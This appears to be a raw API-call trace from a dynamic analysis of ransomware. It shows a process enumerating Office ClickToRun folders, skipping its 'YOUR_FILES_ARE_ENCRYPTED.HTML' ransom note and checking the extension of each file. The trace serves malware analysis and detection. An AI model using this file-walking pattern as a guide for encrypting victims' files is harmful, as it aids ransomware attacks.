[0169.627] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2eafe0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.627] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.627] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.627] GetProcessHeap () returned 0x270000 [0169.628] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.628] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba0f1e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.628] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.628] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.628] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0169.628] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned 82 [0169.628] GetProcessHeap () returned 0x270000 [0169.628] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.628] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" [0169.628] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*" [0169.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.629] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.629] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96130e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac2a70f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x44e23, dwReserved0=0x0, dwReserved1=0x60, cFileName="AirSpace.Etw.man", cAlternateFileName="AIRSPA~1.MAN")) returned 1 [0169.629] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man") returned 99 [0169.629] lstrcmpW (lpString1="AirSpace.Etw.man", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.629] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0169.629] lstrlenW (lpString=".man") returned 4 [0169.629] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0169.629] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb3372a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x9786, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49", cAlternateFileName="C2RMAN~1.CF0")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned 198 [0169.630] lstrcmpW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned=".CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49" [0169.630] lstrlenW (lpString=".CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb35d400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xe048, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430", cAlternateFileName="C2RMAN~1.82E")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned 186 [0169.630] lstrcmpW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned=".82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430" [0169.630] lstrlenW (lpString=".82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb383560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458", cAlternateFileName="C2RMAN~1.143")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned 189 [0169.630] lstrcmpW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned=".14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458" [0169.630] lstrlenW (lpString=".14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb3a96c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x410e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734", cAlternateFileName="C2RMAN~1.541")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") returned 192 [0169.630] lstrcmpW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW 
(pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") returned=".54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734" [0169.630] lstrlenW (lpString=".54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb3f5980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2656, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677", cAlternateFileName="C2RMAN~1.5BC")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned 183 [0169.630] lstrcmpW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned=".5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677" [0169.630] lstrlenW (lpString=".5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb441c40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3a132, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B", cAlternateFileName="C2RMAN~1.24E")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned 196 [0169.630] lstrcmpW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned=".24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B" [0169.630] lstrlenW (lpString=".24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb41bae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x88d0, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872", cAlternateFileName="C2RMAN~1.922")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned 185 [0169.631] lstrcmpW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned=".922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872" [0169.631] lstrlenW (lpString=".922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb48df00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x8f06, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C", cAlternateFileName="C2RMAN~1.04C")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned 198 [0169.631] lstrcmpW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW 
(pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned=".04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C" [0169.631] lstrlenW (lpString=".04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb4da1c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x17f6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B", cAlternateFileName="C2RMAN~1.63E")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned 186 [0169.631] lstrcmpW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned=".63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B" [0169.631] lstrlenW (lpString=".63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb500320, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x15dd6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C", cAlternateFileName="C2RMAN~1.928")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned 194 [0169.631] lstrcmpW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned=".928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C" [0169.631] lstrlenW (lpString=".928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb526480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5b20, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63", cAlternateFileName="C2RMAN~1.0BD")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") returned 184 [0169.631] lstrcmpW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") returned=".0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63" [0169.632] lstrlenW (lpString=".0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") returned 65 [0169.632] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb54c5e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1a182, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303", cAlternateFileName="C2RMAN~1.1F2")) returned 1 [0169.632] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") returned 186 [0169.632] lstrcmpW (lpString1="C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.632] PathFindExtensionW 
